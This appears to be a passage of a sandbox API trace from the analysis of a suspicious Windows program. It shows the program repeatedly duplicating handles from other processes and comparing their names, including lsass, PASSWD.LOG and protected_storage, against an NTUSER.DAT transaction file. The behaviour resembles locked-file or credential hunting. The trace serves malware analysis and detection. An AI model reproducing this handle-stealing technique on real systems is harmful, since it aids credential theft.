[0165.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.574] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.574] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.575] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.575] CloseHandle (hObject=0x1e4) returned 1 [0165.575] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.575] CloseHandle (hObject=0x194) returned 1 [0165.575] CloseHandle (hObject=0x1e8) returned 1 [0165.575] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.575] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.576] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.577] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.577] CloseHandle (hObject=0x1e4) returned 1 [0165.577] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.577] CloseHandle (hObject=0x194) returned 1 [0165.577] CloseHandle (hObject=0x1e8) returned 1 [0165.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.578] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.578] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.579] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.579] CloseHandle (hObject=0x1e4) returned 1 [0165.579] CloseHandle (hObject=0x194) returned 1 [0165.579] CloseHandle (hObject=0x1e8) returned 1 [0165.579] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.579] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.580] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.581] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.581] CloseHandle (hObject=0x1e4) returned 1 [0165.581] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.581] CloseHandle (hObject=0x194) returned 1 [0165.581] CloseHandle (hObject=0x1e8) returned 1 [0165.581] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.581] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.582] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.582] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.583] CloseHandle (hObject=0x1e4) returned 1 [0165.583] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.583] CloseHandle (hObject=0x194) returned 1 [0165.583] CloseHandle (hObject=0x1e8) returned 1 [0165.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.583] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.584] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.585] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.585] CloseHandle (hObject=0x1e4) returned 1 [0165.585] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.585] CloseHandle (hObject=0x194) returned 1 [0165.585] CloseHandle (hObject=0x1e8) returned 1 [0165.585] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.585] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.586] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.595] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.595] CloseHandle (hObject=0x1e4) returned 1 [0165.595] CloseHandle (hObject=0x194) returned 1 [0165.595] CloseHandle (hObject=0x1e8) returned 1 [0165.595] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.595] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.596] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.599] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.599] CloseHandle (hObject=0x1e4) returned 1 [0165.599] CloseHandle (hObject=0x194) returned 1 [0165.599] CloseHandle (hObject=0x1e8) returned 1 [0165.599] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.599] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.600] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.601] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.601] CloseHandle (hObject=0x1e4) returned 1 [0165.601] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.601] CloseHandle (hObject=0x194) returned 1 [0165.601] CloseHandle (hObject=0x1e8) returned 1 [0165.601] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.601] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.602] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.603] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.603] CloseHandle (hObject=0x1e4) returned 1 [0165.603] CloseHandle (hObject=0x194) returned 1 [0165.603] CloseHandle (hObject=0x1e8) returned 1 [0165.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.603] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.604] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.605] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.605] CloseHandle (hObject=0x1e4) returned 1 [0165.605] CloseHandle (hObject=0x194) returned 1 [0165.605] CloseHandle (hObject=0x1e8) returned 1 [0165.605] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.605] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.606] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.606] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.607] CloseHandle (hObject=0x1e4) returned 1 [0165.607] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.607] CloseHandle (hObject=0x194) returned 1 [0165.607] CloseHandle (hObject=0x1e8) returned 1 [0165.607] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.607] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.608] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.608] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.608] CloseHandle (hObject=0x1e4) returned 1 [0165.609] CloseHandle (hObject=0x194) returned 1 [0165.609] CloseHandle (hObject=0x1e8) returned 1 [0165.609] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.609] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.610] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.610] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.610] CloseHandle (hObject=0x1e4) returned 1 [0165.611] CloseHandle (hObject=0x194) returned 1 [0165.611] CloseHandle (hObject=0x1e8) returned 1 [0165.611] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.611] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.611] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.612] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.612] CloseHandle (hObject=0x1e4) returned 1 [0165.612] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.613] CloseHandle (hObject=0x194) returned 1 [0165.613] CloseHandle (hObject=0x1e8) returned 1 [0165.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.613] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.614] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.615] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.615] CloseHandle (hObject=0x1e4) returned 1 [0165.615] CloseHandle (hObject=0x194) returned 1 [0165.615] CloseHandle (hObject=0x1e8) returned 1 [0165.615] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.615] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.617] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.619] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.620] CloseHandle (hObject=0x1e4) returned 1 [0165.620] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.620] CloseHandle (hObject=0x194) returned 1 [0165.620] CloseHandle (hObject=0x1e8) returned 1 [0165.620] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.620] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.620] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.621] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.621] CloseHandle (hObject=0x1e4) returned 1 [0165.621] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.621] CloseHandle (hObject=0x194) returned 1 [0165.621] CloseHandle (hObject=0x1e8) returned 1 [0165.622] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.622] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.622] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.623] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.623] CloseHandle (hObject=0x1e4) returned 1 [0165.623] CloseHandle (hObject=0x194) returned 1 [0165.623] CloseHandle (hObject=0x1e8) returned 1 [0165.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.623] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.624] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.625] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.625] CloseHandle (hObject=0x1e4) returned 1 [0165.625] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.625] CloseHandle (hObject=0x194) returned 1 [0165.625] CloseHandle (hObject=0x1e8) returned 1 [0165.625] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.625] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.626] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.627] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.627] CloseHandle (hObject=0x1e4) returned 1 [0165.627] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.627] CloseHandle (hObject=0x194) returned 1 [0165.627] CloseHandle (hObject=0x1e8) returned 1 [0165.627] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.627] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.628] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.629] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.629] CloseHandle (hObject=0x1e4) returned 1 [0165.629] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.629] CloseHandle (hObject=0x194) returned 1 [0165.629] CloseHandle (hObject=0x1e8) returned 1 [0165.629] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.630] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.630] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.631] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.631] CloseHandle (hObject=0x1e4) returned 1 [0165.631] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.631] CloseHandle (hObject=0x194) returned 1 [0165.631] CloseHandle (hObject=0x1e8) returned 1 [0165.631] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.631] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.632] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.633] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.633] CloseHandle (hObject=0x1e4) returned 1 [0165.633] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.633] CloseHandle (hObject=0x194) returned 1 [0165.633] CloseHandle (hObject=0x1e8) returned 1 [0165.633] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.633] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.634] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.635] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.635] CloseHandle (hObject=0x1e4) returned 1 [0165.635] CloseHandle (hObject=0x194) returned 1 [0165.635] CloseHandle (hObject=0x1e8) returned 1 [0165.635] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.635] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.636] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.637] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.637] CloseHandle (hObject=0x1e4) returned 1 [0165.637] CloseHandle (hObject=0x194) returned 1 [0165.637] CloseHandle (hObject=0x1e8) returned 1 [0165.637] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.637] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.637] CreateThread (in: 